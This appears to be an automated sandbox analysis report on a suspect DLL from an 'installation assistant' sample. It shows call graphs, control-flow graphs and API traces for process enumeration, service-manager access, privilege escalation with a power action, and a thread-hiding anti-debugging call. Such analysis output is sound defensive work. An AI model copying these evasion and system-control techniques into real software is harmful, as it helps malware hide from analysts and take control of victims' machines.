std::_Facet_Register 4 API calls 101123->101125 101126 6c9c6a43 std::_Facet_Register 4 API calls 101124->101126 101125->101127 101126->101127 101128 6c9c5960 104 API calls 101127->101128 101130 6c84dd1c std::ios_base::_Ios_base_dtor 101128->101130 101129 6c9c4ff0 4 API calls 101129->101060 101130->100977 101130->101129 101132 6c9c5156 101131->101132 101133 6c9c51e8 OpenServiceA 101132->101133 101134 6c9c522f 101132->101134 101133->101132 101134->101026 101141 6c9b03a3 _Yarn __wsopen_s std::locale::_Setgloballocale _strlen 101135->101141 101136 6c9b310e CloseHandle 101136->101141 101137 6c9b3f5f CloseHandle 101137->101141 101138 6c9b251b CloseHandle 101138->101141 101139 6c8537cb 101143 6c9c5d60 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 101139->101143 101140 6c99c1e0 WriteFile WriteFile WriteFile ReadFile 101140->101141 101141->101136 101141->101137 101141->101138 101141->101139 101141->101140 101166 6c99b730 101141->101166 101143->100993 101145 6c866e9f 101144->101145 101148 6c866eb3 101145->101148 101177 6c893560 32 API calls std::_Xinvalid_argument 101145->101177 101149 6c866f5b 101148->101149 101179 6c892250 30 API calls 101148->101179 101180 6c8926e0 24 API calls 4 library calls 101148->101180 101181 6c9c9379 RaiseException 101148->101181 101150 6c866f6e 101149->101150 101178 6c8937e0 32 API calls std::_Xinvalid_argument 101149->101178 101150->101037 101154->101021 101155->101046 101156->101070 101158 6c9c52a0 std::locale::_Setgloballocale 101157->101158 101159 6c9c5320 Process32NextW 101158->101159 101160 6c9c5277 CloseHandle 101158->101160 101161 6c9c53b1 101158->101161 101162 6c9c5345 Process32FirstW 101158->101162 101159->101158 101160->101158 101161->100998 101162->101158 101163->101017 101165->100999 101167 6c99b743 _Yarn __wsopen_s std::locale::_Setgloballocale 101166->101167 101168 6c99c180 101167->101168 101169 6c99bced CreateFileA 101167->101169 101171 6c99aa30 101167->101171 101168->101141 101169->101167 101174 6c99aa43 __wsopen_s std::locale::_Setgloballocale 101171->101174 101172 6c99b43d WriteFile 101172->101174 101173 6c99b3e9 WriteFile 101173->101174 101174->101172 101174->101173 101175 6c99b718 101174->101175 101176 6c99ab95 ReadFile 101174->101176 101175->101167 101176->101174 101177->101148 101178->101150 101179->101148 101180->101148 101181->101148 101182 6c9dcad3 101183 6c9dcafd 101182->101183 101184 6c9dcae5 __dosmaperr 101182->101184 101183->101184 101186 6c9dcb77 101183->101186 101187 6c9dcb48 __dosmaperr 101183->101187 101188 6c9dcb90 101186->101188 101189 6c9dcbab __dosmaperr 101186->101189 101192 6c9dcbe7 __wsopen_s 101186->101192 101224 6c9d0120 18 API calls __cftoe 101187->101224 101188->101189 101191 6c9dcb95 101188->101191 101217 6c9d0120 18 API calls __cftoe 101189->101217 101190 6c9e19e5 __wsopen_s 18 API calls 101193 6c9dcd3e 101190->101193 101191->101190 101218 6c9d47bb HeapFree GetLastError _free 101192->101218 101196 6c9dcdb4 101193->101196 101199 6c9dcd57 GetConsoleMode 101193->101199 101198 6c9dcdb8 ReadFile 101196->101198 101197 6c9dcc07 101219 6c9d47bb HeapFree GetLastError _free 101197->101219 101201 6c9dce2c GetLastError 101198->101201 101202 6c9dcdd2 101198->101202 101199->101196 101203 6c9dcd68 101199->101203 101205 6c9dcbc2 __dosmaperr __wsopen_s 101201->101205 101202->101201 101206 6c9dcda9 101202->101206 101203->101198 101207 6c9dcd6e ReadConsoleW 101203->101207 101204 6c9dcc0e 101204->101205 101220 6c9dac69 20 API calls __wsopen_s 101204->101220 101221 6c9d47bb HeapFree GetLastError _free 101205->101221 101206->101205 101211 6c9dce0e 101206->101211 101212 6c9dcdf7 101206->101212 101207->101206 101209 6c9dcd8a GetLastError 101207->101209 101209->101205 101211->101205 101214 6c9dce25 101211->101214 101222 6c9dcefe 23 API calls 3 library calls 101212->101222 101223 6c9dd1b6 21 API calls __wsopen_s 101214->101223 101216 6c9dce2a 101216->101205 101217->101205 101218->101197 101219->101204 101220->101191 101221->101184 101222->101205 101223->101216 101224->101184
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245016856.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2244991895.000000006C840000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246137276.000000006C9E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246896845.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246937970.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247689143.000000006CBB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: _strlen
                              • String ID: HR^
                              • API String ID: 4218353326-1341859651
                              • Opcode ID: 5753fe82e663555d26618337d45ed783baa6bc9002bd3a4f142ae4c8287a9f8d
                              • Instruction ID: c37e37f9a5d207089a7c271f5c8aa9bd8b33bf74d12aa5421bd7300819d1ceb9
                              • Opcode Fuzzy Hash: 5753fe82e663555d26618337d45ed783baa6bc9002bd3a4f142ae4c8287a9f8d
                              • Instruction Fuzzy Hash: C9741531644B068FC738CF28C9D0A95B7E3EF95318B59CE2DC0A68BA55E774B54ACB40
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245016856.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2244991895.000000006C840000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246137276.000000006C9E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246896845.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246937970.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247689143.000000006CBB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID: }jk$;T55$L@^
                              • API String ID: 0-4218709813
                              • Opcode ID: c2f78f6d4649577d3ad6ac76cb98e9e49b91f7164b7d4cfa98d8e50f7caf5917
                              • Instruction ID: 5d650607bffae1e45f3b3ed6245561171a644e61ceefd0a72d703a4bf72d480e
                              • Opcode Fuzzy Hash: c2f78f6d4649577d3ad6ac76cb98e9e49b91f7164b7d4cfa98d8e50f7caf5917
                              • Instruction Fuzzy Hash: 9B3447716447018FC738CF28C9D0A96B7E3EF95318B998E6DC0A64BB45E7B4B51ACB40

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 7677 6c9c5240-6c9c5275 CreateToolhelp32Snapshot 7678 6c9c52a0-6c9c52a9 7677->7678 7679 6c9c52ab-6c9c52b0 7678->7679 7680 6c9c52e0-6c9c52e5 7678->7680 7681 6c9c5315-6c9c531a 7679->7681 7682 6c9c52b2-6c9c52b7 7679->7682 7683 6c9c52eb-6c9c52f0 7680->7683 7684 6c9c5377-6c9c53a1 call 6c9d2c05 7680->7684 7685 6c9c53a6-6c9c53ab 7681->7685 7686 6c9c5320-6c9c5332 Process32NextW 7681->7686 7688 6c9c52b9-6c9c52be 7682->7688 7689 6c9c5334-6c9c535d call 6c9cb920 Process32FirstW 7682->7689 7690 6c9c5277-6c9c5292 CloseHandle 7683->7690 7691 6c9c52f2-6c9c52f7 7683->7691 7684->7678 7685->7678 7696 6c9c53b1-6c9c53bf 7685->7696 7693 6c9c5362-6c9c5372 7686->7693 7688->7678 7697 6c9c52c0-6c9c52d1 7688->7697 7689->7693 7690->7678 7691->7678 7692 6c9c52f9-6c9c5313 7691->7692 7692->7678 7693->7678 7697->7678
                              APIs
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 6C9C524E
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245016856.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2244991895.000000006C840000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246137276.000000006C9E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246896845.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246937970.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247689143.000000006CBB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: CreateSnapshotToolhelp32
                              • String ID:
                              • API String ID: 3332741929-0
                              • Opcode ID: d83ad523e2cf8e22d7c987bf5df32e2597f18d713c4479961b3f6aa667d1e9ad
                              • Instruction ID: 31be1f0ca3d4bbeda6367e29f6c68350a6e0a1da20f010e9946151cd36c066b4
                              • Opcode Fuzzy Hash: d83ad523e2cf8e22d7c987bf5df32e2597f18d713c4479961b3f6aa667d1e9ad
                              • Instruction Fuzzy Hash: A6315A74608341DFD710AF28C888B1ABBF8AF9A748F90492EE498D7760D371D9499B53

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 7821 6c843886-6c84388e 7822 6c843894-6c843896 7821->7822 7823 6c843970-6c84397d 7821->7823 7822->7823 7824 6c84389c-6c8438b9 7822->7824 7825 6c8439f1-6c8439f8 7823->7825 7826 6c84397f-6c843989 7823->7826 7827 6c8438c0-6c8438c1 7824->7827 7829 6c843ab5-6c843aba 7825->7829 7830 6c8439fe-6c843a03 7825->7830 7826->7824 7828 6c84398f-6c843994 7826->7828 7833 6c84395e 7827->7833 7835 6c843b16-6c843b18 7828->7835 7836 6c84399a-6c84399f 7828->7836 7829->7824 7834 6c843ac0-6c843ac7 7829->7834 7831 6c8438d2-6c8438d4 7830->7831 7832 6c843a09-6c843a2f 7830->7832 7839 6c843957-6c84395c 7831->7839 7837 6c843a35-6c843a3a 7832->7837 7838 6c8438f8-6c843955 7832->7838 7840 6c843960-6c843964 7833->7840 7834->7827 7841 6c843acd-6c843ad6 7834->7841 7835->7827 7842 6c8439a5-6c8439bf 7836->7842 7843 6c84383b-6c843855 call 6c991470 call 6c991480 7836->7843 7844 6c843a40-6c843a57 7837->7844 7845 6c843b1d-6c843b22 7837->7845 7838->7839 7839->7833 7847 6c843860-6c843885 7840->7847 7848 6c84396a 7840->7848 7841->7835 7849 6c843ad8-6c843aeb 7841->7849 7850 6c843a5a-6c843a5d 7842->7850 7843->7847 7844->7850 7856 6c843b24-6c843b44 7845->7856 7857 6c843b49-6c843b50 7845->7857 7847->7821 7853 6c843ba1-6c843bb6 7848->7853 7849->7838 7854 6c843af1-6c843af8 7849->7854 7851 6c843aa9-6c843ab0 7850->7851 7851->7840 7859 6c843bc0-6c843bda call 6c991470 call 6c991480 7853->7859 7861 6c843b62-6c843b85 7854->7861 7862 6c843afa-6c843aff 7854->7862 7856->7851 7857->7827 7858 6c843b56-6c843b5d 7857->7858 7858->7840 7872 6c843be0-6c843bfe 7859->7872 7861->7838 7865 6c843b8b 7861->7865 7862->7839 7865->7853 7875 6c843c04-6c843c11 7872->7875 7876 6c843e7b 7872->7876 7878 6c843c17-6c843c20 7875->7878 7879 6c843ce0-6c843cea 7875->7879 7877 6c843e81-6c843ee0 call 6c843750 GetCurrentThread NtSetInformationThread 7876->7877 7896 6c843eea-6c843f04 call 6c991470 call 6c991480 7877->7896 7883 6c843dc5 7878->7883 7884 6c843c26-6c843c2d 7878->7884 7880 6c843cec-6c843d0c 7879->7880 7881 6c843d3a-6c843d3c 7879->7881 7887 6c843d90-6c843d95 7880->7887 7888 6c843d70-6c843d8d 7881->7888 7889 6c843d3e-6c843d45 7881->7889 7891 6c843dc6 7883->7891 7885 6c843dc3 7884->7885 7886 6c843c33-6c843c3a 7884->7886 7885->7883 7892 6c843e26-6c843e2b 7886->7892 7893 6c843c40-6c843c5b 7886->7893 7897 6c843d97-6c843db8 7887->7897 7898 6c843dba-6c843dc1 7887->7898 7888->7887 7895 6c843d50-6c843d57 7889->7895 7894 6c843dc8-6c843dcc 7891->7894 7899 6c843e31 7892->7899 7900 6c843c7b-6c843cd0 7892->7900 7901 6c843e1b-6c843e24 7893->7901 7894->7872 7902 6c843dd2 7894->7902 7895->7891 7915 6c843f75-6c843fa1 7896->7915 7897->7883 7898->7885 7904 6c843dd7-6c843ddc 7898->7904 7899->7859 7900->7895 7901->7894 7905 6c843e76-6c843e79 7901->7905 7902->7905 7907 6c843e36-6c843e3d 7904->7907 7908 6c843dde-6c843e17 7904->7908 7905->7877 7909 6c843e5c-6c843e5f 7907->7909 7910 6c843e3f-6c843e5a 7907->7910 7908->7901 7909->7900 7913 6c843e65-6c843e69 7909->7913 7910->7901 7913->7894 7913->7905 7919 6c844020-6c844026 7915->7919 7920 6c843fa3-6c843fa8 7915->7920 7923 6c843f06-6c843f35 7919->7923 7924 6c84402c-6c84403c 7919->7924 7921 6c84407c-6c844081 7920->7921 7922 6c843fae-6c843fcf 7920->7922 7925 6c844083-6c84408a 7921->7925 7926 6c8440aa-6c8440ae 7921->7926 7922->7926 7927 6c843f38-6c843f61 7923->7927 7928 6c8440b3-6c8440b8 7924->7928 7929 6c84403e-6c844058 7924->7929 7925->7927 7930 6c844090 7925->7930 7931 6c843f6b-6c843f6f 7926->7931 7933 6c843f64-6c843f67 7927->7933 7928->7922 7932 6c8440be-6c8440c9 7928->7932 7934 6c84405a-6c844063 7929->7934 7930->7896 7935 6c8440a7 7930->7935 7931->7915 7932->7926 7936 6c8440cb-6c8440d4 7932->7936 7937 6c843f69 7933->7937 7938 6c8440f5-6c84413f 7934->7938 7939 6c844069-6c84406c 7934->7939 7935->7926 7936->7935 7942 6c8440d6-6c8440f0 7936->7942 7937->7931 7938->7937 7940 6c844144-6c84414b 7939->7940 7941 6c844072-6c844077 7939->7941 7940->7931 7941->7933 7942->7934
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245016856.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2244991895.000000006C840000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246137276.000000006C9E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246896845.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246937970.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247689143.000000006CBB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 244230555eef82cb4696f4d7bae6a196d93a95c86bf71847ce6df1978ce7b198
                              • Instruction ID: f2a63c24c0199f17716db9275b25eba23e40ef1b1acf77c6e9f97e44f71c9d1c
                              • Opcode Fuzzy Hash: 244230555eef82cb4696f4d7bae6a196d93a95c86bf71847ce6df1978ce7b198
                              • Instruction Fuzzy Hash: 8432E132245B058FC334CF28C9C0695B7E3EFD1314B69CE6DC0AA4BA95D775B84A8B50

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 7969 6c843a6a-6c843a85 7970 6c843a87-6c843aa7 7969->7970 7971 6c843aa9-6c843ab0 7970->7971 7972 6c843960-6c843964 7971->7972 7973 6c843860-6c84388e 7972->7973 7974 6c84396a 7972->7974 7983 6c843894-6c843896 7973->7983 7984 6c843970-6c84397d 7973->7984 7975 6c843ba1-6c843bb6 7974->7975 7977 6c843bc0-6c843bda call 6c991470 call 6c991480 7975->7977 7991 6c843be0-6c843bfe 7977->7991 7983->7984 7986 6c84389c-6c8438b9 7983->7986 7988 6c8439f1-6c8439f8 7984->7988 7989 6c84397f-6c843989 7984->7989 7990 6c8438c0-6c8438c1 7986->7990 7993 6c843ab5-6c843aba 7988->7993 7994 6c8439fe-6c843a03 7988->7994 7989->7986 7992 6c84398f-6c843994 7989->7992 7997 6c84395e 7990->7997 8013 6c843c04-6c843c11 7991->8013 8014 6c843e7b 7991->8014 8000 6c843b16-6c843b18 7992->8000 8001 6c84399a-6c84399f 7992->8001 7993->7986 7998 6c843ac0-6c843ac7 7993->7998 7995 6c8438d2-6c8438d4 7994->7995 7996 6c843a09-6c843a2f 7994->7996 8004 6c843957-6c84395c 7995->8004 8002 6c843a35-6c843a3a 7996->8002 8003 6c8438f8-6c843955 7996->8003 7997->7972 7998->7990 8005 6c843acd-6c843ad6 7998->8005 8000->7990 8007 6c8439a5-6c8439bf 8001->8007 8008 6c84383b-6c843855 call 6c991470 call 6c991480 8001->8008 8009 6c843a40-6c843a57 8002->8009 8010 6c843b1d-6c843b22 8002->8010 8003->8004 8004->7997 8005->8000 8012 6c843ad8-6c843aeb 8005->8012 8015 6c843a5a-6c843a5d 8007->8015 8008->7973 8009->8015 8019 6c843b24-6c843b44 8010->8019 8020 6c843b49-6c843b50 8010->8020 8012->8003 8018 6c843af1-6c843af8 8012->8018 8021 6c843c17-6c843c20 8013->8021 8022 6c843ce0-6c843cea 8013->8022 8017 6c843e81-6c843ee0 call 6c843750 GetCurrentThread NtSetInformationThread 8014->8017 8015->7971 8045 6c843eea-6c843f04 call 6c991470 call 6c991480 8017->8045 8028 6c843b62-6c843b85 8018->8028 8029 6c843afa-6c843aff 8018->8029 8019->7970 8020->7990 8023 6c843b56-6c843b5d 8020->8023 8030 6c843dc5 8021->8030 8031 6c843c26-6c843c2d 8021->8031 8024 6c843cec-6c843d0c 8022->8024 8025 6c843d3a-6c843d3c 8022->8025 8023->7972 8035 6c843d90-6c843d95 8024->8035 8036 6c843d70-6c843d8d 8025->8036 8037 6c843d3e-6c843d45 8025->8037 8028->8003 8034 6c843b8b 8028->8034 8029->8004 8039 6c843dc6 8030->8039 8032 6c843dc3 8031->8032 8033 6c843c33-6c843c3a 8031->8033 8032->8030 8041 6c843e26-6c843e2b 8033->8041 8042 6c843c40-6c843c5b 8033->8042 8034->7975 8046 6c843d97-6c843db8 8035->8046 8047 6c843dba-6c843dc1 8035->8047 8036->8035 8044 6c843d50-6c843d57 8037->8044 8043 6c843dc8-6c843dcc 8039->8043 8048 6c843e31 8041->8048 8049 6c843c7b-6c843cd0 8041->8049 8050 6c843e1b-6c843e24 8042->8050 8043->7991 8051 6c843dd2 8043->8051 8044->8039 8064 6c843f75-6c843fa1 8045->8064 8046->8030 8047->8032 8053 6c843dd7-6c843ddc 8047->8053 8048->7977 8049->8044 8050->8043 8054 6c843e76-6c843e79 8050->8054 8051->8054 8056 6c843e36-6c843e3d 8053->8056 8057 6c843dde-6c843e17 8053->8057 8054->8017 8058 6c843e5c-6c843e5f 8056->8058 8059 6c843e3f-6c843e5a 8056->8059 8057->8050 8058->8049 8062 6c843e65-6c843e69 8058->8062 8059->8050 8062->8043 8062->8054 8068 6c844020-6c844026 8064->8068 8069 6c843fa3-6c843fa8 8064->8069 8072 6c843f06-6c843f35 8068->8072 8073 6c84402c-6c84403c 8068->8073 8070 6c84407c-6c844081 8069->8070 8071 6c843fae-6c843fcf 8069->8071 8074 6c844083-6c84408a 8070->8074 8075 6c8440aa-6c8440ae 8070->8075 8071->8075 8076 6c843f38-6c843f61 8072->8076 8077 6c8440b3-6c8440b8 8073->8077 8078 6c84403e-6c844058 8073->8078 8074->8076 8079 6c844090 8074->8079 8080 6c843f6b-6c843f6f 8075->8080 8082 6c843f64-6c843f67 8076->8082 8077->8071 8081 6c8440be-6c8440c9 8077->8081 8083 6c84405a-6c844063 8078->8083 8079->8045 8084 6c8440a7 8079->8084 8080->8064 8081->8075 8085 6c8440cb-6c8440d4 8081->8085 8086 6c843f69 8082->8086 8087 6c8440f5-6c84413f 8083->8087 8088 6c844069-6c84406c 8083->8088 8084->8075 8085->8084 8091 6c8440d6-6c8440f0 8085->8091 8086->8080 8087->8086 8089 6c844144-6c84414b 8088->8089 8090 6c844072-6c844077 8088->8090 8089->8080 8090->8082 8091->8083
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245016856.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2244991895.000000006C840000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246137276.000000006C9E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246896845.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246937970.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247689143.000000006CBB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: CurrentThread
                              • String ID:
                              • API String ID: 2882836952-0
                              • Opcode ID: 0bffeff137d34e99148fd098f05be2e63931f8705cd20c078e395f97ad5b0e67
                              • Instruction ID: 22ff7787122639e43f034ecbbb92bc582a06f3c4b36210911af70e182d90ab40
                              • Opcode Fuzzy Hash: 0bffeff137d34e99148fd098f05be2e63931f8705cd20c078e395f97ad5b0e67
                              • Instruction Fuzzy Hash: 0851DE31145B098FC3308F28C980795B7A3BFE6314F69CE5DC0E61BA95DB75B94A8B41
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245016856.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2244991895.000000006C840000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246137276.000000006C9E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246896845.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246937970.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247689143.000000006CBB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: CurrentThread
                              • String ID:
                              • API String ID: 2882836952-0
                              • Opcode ID: fbcb66aee56cddae52140ef18b06093d8e165a9d8063fc8ebe22021a50683871
                              • Instruction ID: 6e04b7dca432b968c72206369651328e8d3666cfc9089c52c2d7bd03b78e5340
                              • Opcode Fuzzy Hash: fbcb66aee56cddae52140ef18b06093d8e165a9d8063fc8ebe22021a50683871
                              • Instruction Fuzzy Hash: 0451EE31105B098BC330CF28C580796B7A3BFD6314F69CE5DC0E65BA95DB70B94A8B90
                              APIs
                              • GetCurrentThread.KERNEL32 ref: 6C843E9D
                              • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6C843EAA
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245016856.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2244991895.000000006C840000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246137276.000000006C9E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246896845.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246937970.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247689143.000000006CBB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: Thread$CurrentInformation
                              • String ID:
                              • API String ID: 1650627709-0
                              • Opcode ID: 7472dbbd4e151a47be212979a1abfc56234cb8e942e98705e52eab01cc631e8d
                              • Instruction ID: ed790f80eea3cd6e35f54039665b77fced540173c70f2162d72367af7fd491ea
                              • Opcode Fuzzy Hash: 7472dbbd4e151a47be212979a1abfc56234cb8e942e98705e52eab01cc631e8d
                              • Instruction Fuzzy Hash: 8D310131145B09CBD330CF28C9847C6B7A3BFE6314F298E1DC0A65BA80DB74B80A8B51
                              APIs
                              • GetCurrentThread.KERNEL32 ref: 6C843E9D
                              • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6C843EAA
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245016856.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2244991895.000000006C840000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246137276.000000006C9E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246896845.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246937970.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247689143.000000006CBB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: Thread$CurrentInformation
                              • String ID:
                              • API String ID: 1650627709-0
                              • Opcode ID: 1eabbf8a7b7c68cc41f9b5f3ebfa3bb84c399d155f8f897f25f699a86dc85882
                              • Instruction ID: dc9a4fcad26ee582619bbe2309212c3004303c9019aacba6b08563165057b3c2
                              • Opcode Fuzzy Hash: 1eabbf8a7b7c68cc41f9b5f3ebfa3bb84c399d155f8f897f25f699a86dc85882
                              • Instruction Fuzzy Hash: DE31F131104B09CBD734CF28C590796B7A7BF96308F298E1DC0E65BA85DB71B945CB51
                              APIs
                              • GetCurrentThread.KERNEL32 ref: 6C843E9D
                              • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6C843EAA
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245016856.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2244991895.000000006C840000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246137276.000000006C9E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246896845.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246937970.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247689143.000000006CBB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: Thread$CurrentInformation
                              • String ID:
                              • API String ID: 1650627709-0
                              • Opcode ID: 5681025bd2a68d4813872677f7cf530a3d5e55fb3b05b570a0914ff541e6e245
                              • Instruction ID: b5d371d2f6347097df7b3f6cee66765a4ed6f64425a92012988191d2dcf5a6aa
                              • Opcode Fuzzy Hash: 5681025bd2a68d4813872677f7cf530a3d5e55fb3b05b570a0914ff541e6e245
                              • Instruction Fuzzy Hash: DD210630118B09CBD738CF24C990796B7B7BF96305F28CE1DC0A64BA90DB75B9058B51
                              APIs
                              • OpenSCManagerA.SECHOST(00000000,00000000,00000001), ref: 6C9C5130
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245016856.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2244991895.000000006C840000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246137276.000000006C9E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246896845.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
